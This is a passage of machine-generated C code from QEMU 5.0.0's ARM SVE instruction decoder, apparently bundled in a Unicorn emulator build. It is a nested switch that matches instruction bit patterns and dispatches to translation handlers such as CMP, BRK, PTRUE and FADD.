(trans_CMPEQ_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x0000a010: /* 00100100 ..0..... 101..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:588 */ if (trans_CMPNE_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x0000c000: /* 00100100 ..0..... 110..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:598 */ if (trans_CMPHS_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x0000c010: /* 00100100 ..0..... 110..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:599 */ if (trans_CMPHI_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x0000e000: /* 00100100 ..0..... 111..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:600 */ if (trans_CMPLO_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x0000e010: /* 00100100 ..0..... 111..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:601 */ if (trans_CMPLS_ppzw(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x00200000: /* 00100100 ..1..... ........ ........ */ disas_sve_extract_pd_pg_rn_i7(ctx, &u.f_rpri_esz, insn); switch (insn & 0x00002010) { case 0x00000000: /* 00100100 ..1..... ..0..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:606 */ if (trans_CMPHS_ppzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00000010: /* 00100100 ..1..... ..0..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:607 */ if (trans_CMPHI_ppzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00002000: /* 00100100 ..1..... ..1..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:608 */ if (trans_CMPLO_ppzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00002010: /* 00100100 ..1..... ..1..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:609 */ if (trans_CMPLS_ppzi(ctx, &u.f_rpri_esz)) return true; return false; } return false; case 0x01000000: /* 00100101 ..0..... ........ ........ */ switch (insn & 0x0000c010) { case 0x00000000: /* 00100101 ..0..... 00...... ...0.... */ disas_sve_extract_pd_pg_rn_i5(ctx, &u.f_rpri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..0..... 000..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:614 */ if (trans_CMPGE_ppzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x1: /* 00100101 ..0..... 001..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:616 */ if (trans_CMPLT_ppzi(ctx, &u.f_rpri_esz)) return true; return false; } return false; case 0x00000010: /* 00100101 ..0..... 00...... ...1.... */ disas_sve_extract_pd_pg_rn_i5(ctx, &u.f_rpri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..0..... 000..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:615 */ if (trans_CMPGT_ppzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x1: /* 00100101 ..0..... 001..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:617 */ if (trans_CMPLE_ppzi(ctx, &u.f_rpri_esz)) return true; return false; } return false; case 0x00004000: /* 00100101 ..0..... 01...... ...0.... */ switch (insn & 0x00900200) { case 0x00000000: /* 00100101 0.00.... 01....0. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:624 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_AND_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00000200: /* 00100101 0.00.... 01....1. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:626 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_EOR_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00100000: /* 00100101 0.01.... 01....0. ...0.... */ disas_sve_extract_pd_pg_pn_s(ctx, &u.f_rpr_s, insn); switch ((insn >> 16) & 0xf) { case 0x0: /* 00100101 0.010000 01....0. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:669 */ if (trans_BRKA_z(ctx, &u.f_rpr_s)) return true; return false; case 0x8: /* 00100101 0.011000 01....0. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:675 */ if (trans_BRKN(ctx, &u.f_rpr_s)) return true; return false; } return false; case 0x00800000: /* 00100101 1.00.... 01....0. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:628 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_ORR_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00800200: /* 00100101 1.00.... 01....1. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:630 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_NOR_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00900000: /* 00100101 1.01.... 01....0. ...0.... */ disas_sve_extract_pd_pg_pn_s(ctx, &u.f_rpr_s, insn); switch ((insn >> 16) & 0xf) { case 0x0: /* 00100101 1.010000 01....0. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:670 */ if (trans_BRKB_z(ctx, &u.f_rpr_s)) return true; return false; } return false; } return false; case 0x00004010: /* 00100101 ..0..... 01...... ...1.... */ switch (insn & 0x00900200) { case 0x00000000: /* 00100101 0.00.... 01....0. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:625 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_BIC_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00000200: /* 00100101 0.00.... 01....1. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:627 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_SEL_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00100000: /* 00100101 0.01.... 01....0. ...1.... */ disas_sve_extract_pd_pg_pn_s0(ctx, &u.f_rpr_s, insn); switch (insn & 0x004f0000) { case 0x00000000: /* 00100101 00010000 01....0. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:671 */ if (trans_BRKA_m(ctx, &u.f_rpr_s)) return true; return false; } return false; case 0x00800000: /* 00100101 1.00.... 01....0. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:629 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_ORN_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00800200: /* 00100101 1.00.... 01....1. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:631 */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); if (trans_NAND_pppp(ctx, &u.f_rprr_s)) return true; return false; case 0x00900000: /* 00100101 1.01.... 01....0. ...1.... */ disas_sve_extract_pd_pg_pn_s0(ctx, &u.f_rpr_s, insn); switch (insn & 0x004f0000) { case 0x00000000: /* 00100101 10010000 01....0. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:672 */ if (trans_BRKB_m(ctx, &u.f_rpr_s)) return true; return false; } return false; } return false; case 0x00008000: /* 00100101 ..0..... 10...... ...0.... */ disas_sve_extract_pd_pg_rn_i5(ctx, &u.f_rpri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..0..... 100..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:618 */ if (trans_CMPEQ_ppzi(ctx, &u.f_rpri_esz)) return true; return false; } return false; case 0x00008010: /* 00100101 ..0..... 10...... ...1.... */ disas_sve_extract_pd_pg_rn_i5(ctx, &u.f_rpri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..0..... 100..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:619 */ if (trans_CMPNE_ppzi(ctx, &u.f_rpri_esz)) return true; return false; } return false; case 0x0000c000: /* 00100101 ..0..... 11...... ...0.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* 00100101 ..00.... 11...... ...0.... */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); switch (insn & 0x00800200) { case 0x00000000: /* 00100101 0.00.... 11....0. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:665 */ if (trans_BRKPA(ctx, &u.f_rprr_s)) return true; return false; } return false; case 0x1: /* 00100101 ..01.... 11...... ...0.... */ switch ((insn >> 17) & 0x7) { case 0x0: /* 00100101 ..01000. 11...... ...0.... */ disas_sve_extract_disas_sve_Fmt_64(ctx, &u.f_disas_sve31, insn); switch (insn & 0x00c1020f) { case 0x00400000: /* 00100101 01010000 11....0. ...00000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:636 */ if (trans_PTEST(ctx, &u.f_disas_sve31)) return true; return false; } return false; case 0x4: /* 00100101 ..01100. 11...... ...0.... */ switch ((insn >> 10) & 0xf) { case 0x0: /* 00100101 ..01100. 110000.. ...0.... */ disas_sve_extract_pd_pn_e0(ctx, &u.f_rr_esz, insn); switch (insn & 0x00c10200) { case 0x00400000: /* 00100101 01011000 1100000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:657 */ if (trans_PFIRST(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x1: /* 00100101 ..01100. 110001.. ...0.... */ disas_sve_extract_pd_pn(ctx, &u.f_rr_esz, insn); switch (insn & 0x00010200) { case 0x00010000: /* 00100101 ..011001 1100010. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:660 */ if (trans_PNEXT(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x8: /* 00100101 ..01100. 111000.. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:639 */ disas_sve_extract_disas_sve_Fmt_65(ctx, &u.f_ptrue, insn); if (trans_PTRUE(ctx, &u.f_ptrue)) return true; return false; case 0x9: /* 00100101 ..01100. 111001.. ...0.... */ disas_sve_extract_disas_sve_Fmt_67(ctx, &u.f_disas_sve33, insn); switch (insn & 0x00c103e0) { case 0x00000000: /* 00100101 00011000 11100100 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:645 */ if (trans_PFALSE(ctx, &u.f_disas_sve33)) return true; return false; } return false; case 0xc: /* 00100101 ..01100. 111100.. ...0.... */ switch (insn & 0x00810200) { case 0x00000000: /* 00100101 0.011000 1111000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:648 */ disas_sve_extract_disas_sve_Fmt_68(ctx, &u.f_disas_sve34, insn); if (trans_RDFFR_p(ctx, &u.f_disas_sve34)) return true; return false; case 0x00010000: /* 00100101 0.011001 1111000. ...0.... */ disas_sve_extract_disas_sve_Fmt_67(ctx, &u.f_disas_sve33, insn); switch (insn & 0x004001e0) { case 0x00000000: /* 00100101 00011001 11110000 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:651 */ if (trans_RDFFR(ctx, &u.f_disas_sve33)) return true; return false; } return false; } return false; } return false; } return false; } return false; case 0x0000c010: /* 00100101 ..0..... 11...... ...1.... */ disas_sve_extract_pd_pg_pn_pm_s(ctx, &u.f_rprr_s, insn); switch (insn & 0x00900200) { case 0x00000000: /* 00100101 0.00.... 11....0. ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:666 */ if (trans_BRKPB(ctx, &u.f_rprr_s)) return true; return false; } return false; } return false; case 0x01200000: /* 00100101 ..1..... ........ ........ */ switch ((insn >> 14) & 0x3) { case 0x0: /* 00100101 ..1..... 00...... ........ */ switch (insn & 0x00002400) { case 0x00000400: /* 00100101 ..1..... 000..1.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:701 */ disas_sve_extract_disas_sve_Fmt_71(ctx, &u.f_disas_sve37, insn); if (trans_WHILE(ctx, &u.f_disas_sve37)) return true; return false; case 0x00002000: /* 00100101 ..1..... 001..0.. ........ */ disas_sve_extract_disas_sve_Fmt_70(ctx, &u.f_disas_sve36, insn); switch (insn & 0x0080180f) { case 0x00800000: /* 00100101 1.1..... 001000.. ....0000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:698 */ if (trans_CTERM(ctx, &u.f_disas_sve36)) return true; return false; } return false; } return false; case 0x2: /* 00100101 ..1..... 10...... ........ */ switch (insn & 0x001c0200) { case 0x00000000: /* 00100101 ..1000.. 10....0. ........ */ disas_sve_extract_rd_pg4_pn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 16) & 0x3) { case 0x0: /* 00100101 ..100000 10....0. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:680 */ if (trans_CNTP(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x00080000: /* 00100101 ..1010.. 10....0. ........ */ switch ((insn >> 10) & 0xf) { case 0x0: /* 00100101 ..1010.. 1000000. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:693 */ disas_sve_extract_incdec2_pred(ctx, &u.f_incdec2_pred, insn); u.f_incdec2_pred.d = extract32(insn, 17, 1); u.f_incdec2_pred.u = extract32(insn, 16, 1); if (trans_SINCDECP_z(ctx, &u.f_incdec2_pred)) return true; return false; case 0x2: /* 00100101 ..1010.. 1000100. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:689 */ disas_sve_extract_incdec_pred(ctx, &u.f_incdec_pred, insn); u.f_incdec_pred.d = extract32(insn, 17, 1); u.f_incdec_pred.u = extract32(insn, 16, 1); if (trans_SINCDECP_r_32(ctx, &u.f_incdec_pred)) return true; return false; case 0x3: /* 00100101 ..1010.. 1000110. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:690 */ disas_sve_extract_incdec_pred(ctx, &u.f_incdec_pred, insn); u.f_incdec_pred.d = extract32(insn, 17, 1); u.f_incdec_pred.u = extract32(insn, 16, 1); if (trans_SINCDECP_r_64(ctx, &u.f_incdec_pred)) return true; return false; case 0x4: /* 00100101 ..1010.. 1001000. ........ */ disas_sve_extract_disas_sve_Fmt_69(ctx, &u.f_disas_sve35, insn); switch (insn & 0x00c3001f) { case 0x00000000: /* 00100101 00101000 1001000. ...00000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:654 */ if (trans_WRFFR(ctx, &u.f_disas_sve35)) return true; return false; } return false; } return false; case 0x000c0000: /* 00100101 ..1011.. 10....0. ........ */ switch (insn & 0x00023c00) { case 0x00000000: /* 00100101 ..10110. 1000000. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:686 */ disas_sve_extract_incdec2_pred(ctx, &u.f_incdec2_pred, insn); u.f_incdec2_pred.d = extract32(insn, 16, 1); u.f_incdec2_pred.u = 1; if (trans_INCDECP_z(ctx, &u.f_incdec2_pred)) return true; return false; case 0x00000800: /* 00100101 ..10110. 1000100. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:683 */ disas_sve_extract_incdec_pred(ctx, &u.f_incdec_pred, insn); u.f_incdec_pred.d = extract32(insn, 16, 1); u.f_incdec_pred.u = 1; if (trans_INCDECP_r(ctx, &u.f_incdec_pred)) return true; return false; case 0x00001000: /* 00100101 ..10110. 1001000. ........ */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); switch (insn & 0x00c101ff) { case 0x00000000: /* 00100101 00101100 10010000 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:642 */ if (trans_SETFFR(ctx, &u.f_disas_sve32)) return true; return false; } return false; } return false; } return false; case 0x3: /* 00100101 ..1..... 11...... ........ */ switch ((insn >> 16) & 0x1f) { case 0x0: /* 00100101 ..100000 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:712 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_ADD_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x1: /* 00100101 ..100001 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:713 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_SUB_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x3: /* 00100101 ..100011 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:714 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_SUBR_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x4: /* 00100101 ..100100 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:715 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_SQADD_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x5: /* 00100101 ..100101 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:716 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_UQADD_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x6: /* 00100101 ..100110 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:717 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_SQSUB_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x7: /* 00100101 ..100111 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:718 */ disas_sve_extract_rdn_sh_i8u(ctx, &u.f_rri_esz, insn); if (trans_UQSUB_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x8: /* 00100101 ..101000 11...... ........ */ disas_sve_extract_rdn_i8s(ctx, &u.f_rri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..101000 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:721 */ if (trans_SMAX_zzi(ctx, &u.f_rri_esz)) return true; return false; } return false; case 0x9: /* 00100101 ..101001 11...... ........ */ disas_sve_extract_rdn_i8u(ctx, &u.f_rri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..101001 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:722 */ if (trans_UMAX_zzi(ctx, &u.f_rri_esz)) return true; return false; } return false; case 0xa: /* 00100101 ..101010 11...... ........ */ disas_sve_extract_rdn_i8s(ctx, &u.f_rri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..101010 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:723 */ if (trans_SMIN_zzi(ctx, &u.f_rri_esz)) return true; return false; } return false; case 0xb: /* 00100101 ..101011 11...... ........ */ disas_sve_extract_rdn_i8u(ctx, &u.f_rri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..101011 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:724 */ if (trans_UMIN_zzi(ctx, &u.f_rri_esz)) return true; return false; } return false; case 0x10: /* 00100101 ..110000 11...... ........ */ disas_sve_extract_rdn_i8s(ctx, &u.f_rri_esz, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..110000 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:727 */ if (trans_MUL_zzi(ctx, &u.f_rri_esz)) return true; return false; } return false; case 0x18: /* 00100101 ..111000 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:709 */ disas_sve_extract_disas_sve_Fmt_73(ctx, &u.f_disas_sve38, insn); if (trans_DUP_i(ctx, &u.f_disas_sve38)) return true; return false; case 0x19: /* 00100101 ..111001 11...... ........ */ disas_sve_extract_disas_sve_Fmt_72(ctx, &u.f_disas_sve38, insn); switch ((insn >> 13) & 0x1) { case 0x0: /* 00100101 ..111001 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:706 */ if (trans_FDUP(ctx, &u.f_disas_sve38)) return true; return false; } return false; } return false; } return false; } return false; case 0x22: /* 0100010. ........ ........ ........ */ switch (insn & 0x01a0f800) { case 0x00800000: /* 01000100 1.0..... 00000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:730 */ disas_sve_extract_disas_sve_Fmt_74(ctx, &u.f_disas_sve39, insn); if (trans_DOT_zzz(ctx, &u.f_disas_sve39)) return true; return false; case 0x00a00000: /* 01000100 1.1..... 00000... ........ */ switch ((insn >> 22) & 0x1) { case 0x0: /* 01000100 101..... 00000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:733 */ disas_sve_extract_disas_sve_Fmt_75(ctx, &u.f_disas_sve40, insn); if (trans_DOT_zzx(ctx, &u.f_disas_sve40)) return true; return false; case 0x1: /* 01000100 111..... 00000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:735 */ disas_sve_extract_disas_sve_Fmt_76(ctx, &u.f_disas_sve40, insn); if (trans_DOT_zzx(ctx, &u.f_disas_sve40)) return true; return false; } return false; } return false; case 0x32: /* 0110010. ........ ........ ........ */ switch (insn & 0x01208000) { case 0x00000000: /* 01100100 ..0..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:743 */ disas_sve_extract_disas_sve_Fmt_78(ctx, &u.f_disas_sve42, insn); if (trans_FCMLA_zpzzz(ctx, &u.f_disas_sve42)) return true; return false; case 0x00008000: /* 01100100 ..0..... 1....... ........ */ disas_sve_extract_disas_sve_Fmt_77(ctx, &u.f_disas_sve41, insn); switch (insn & 0x001e6000) { case 0x00000000: /* 01100100 ..00000. 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:739 */ if (trans_FCADD(ctx, &u.f_disas_sve41)) return true; return false; } return false; case 0x00200000: /* 01100100 ..1..... 0....... ........ */ switch (insn & 0x00807000) { case 0x00000000: /* 01100100 0.1..... 0000.... ........ */ disas_sve_extract_disas_sve_Fmt_81(ctx, &u.f_disas_sve44, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 01100100 0.1..... 00000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:755 */ if (trans_FMLA_zzxz(ctx, &u.f_disas_sve44)) return true; return false; } return false; case 0x00002000: /* 01100100 0.1..... 0010.... ........ */ disas_sve_extract_disas_sve_Fmt_84(ctx, &u.f_disas_sve45, insn); switch ((insn >> 10) & 0x3) { case 0x0: /* 01100100 0.1..... 001000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:765 */ if (trans_FMUL_zzx(ctx, &u.f_disas_sve45)) return true; return false; } return false; case 0x00800000: /* 01100100 1.1..... 0000.... ........ */ switch (insn & 0x00400800) { case 0x00000000: /* 01100100 101..... 00000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:757 */ disas_sve_extract_disas_sve_Fmt_82(ctx, &u.f_disas_sve44, insn); if (trans_FMLA_zzxz(ctx, &u.f_disas_sve44)) return true; return false; case 0x00400000: /* 01100100 111..... 00000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:759 */ disas_sve_extract_disas_sve_Fmt_83(ctx, &u.f_disas_sve44, insn); if (trans_FMLA_zzxz(ctx, &u.f_disas_sve44)) return true; return false; } return false; case 0x00801000: /* 01100100 1.1..... 0001.... ........ */ switch ((insn >> 22) & 0x1) { case 0x0: /* 01100100 101..... 0001.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:747 */ disas_sve_extract_disas_sve_Fmt_79(ctx, &u.f_disas_sve43, insn); if (trans_FCMLA_zzxz(ctx, &u.f_disas_sve43)) return true; return false; case 0x1: /* 01100100 111..... 0001.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:749 */ disas_sve_extract_disas_sve_Fmt_80(ctx, &u.f_disas_sve43, insn); if (trans_FCMLA_zzxz(ctx, &u.f_disas_sve43)) return true; return false; } return false; case 0x00802000: /* 01100100 1.1..... 0010.... ........ */ switch (insn & 0x00400c00) { case 0x00000000: /* 01100100 101..... 001000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:767 */ disas_sve_extract_disas_sve_Fmt_85(ctx, &u.f_disas_sve45, insn); if (trans_FMUL_zzx(ctx, &u.f_disas_sve45)) return true; return false; case 0x00400000: /* 01100100 111..... 001000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:768 */ disas_sve_extract_disas_sve_Fmt_86(ctx, &u.f_disas_sve45, insn); if (trans_FMUL_zzx(ctx, &u.f_disas_sve45)) return true; return false; } return false; } return false; case 0x01000000: /* 01100101 ..0..... 0....... ........ */ switch ((insn >> 13) & 0x3) { case 0x0: /* 01100101 ..0..... 000..... ........ */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); switch ((insn >> 10) & 0x7) { case 0x0: /* 01100101 ..0..... 000000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:800 */ if (trans_FADD_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x1: /* 01100101 ..0..... 000001.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:801 */ if (trans_FSUB_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x2: /* 01100101 ..0..... 000010.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:802 */ if (trans_FMUL_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x3: /* 01100101 ..0..... 000011.. ........ */ /* 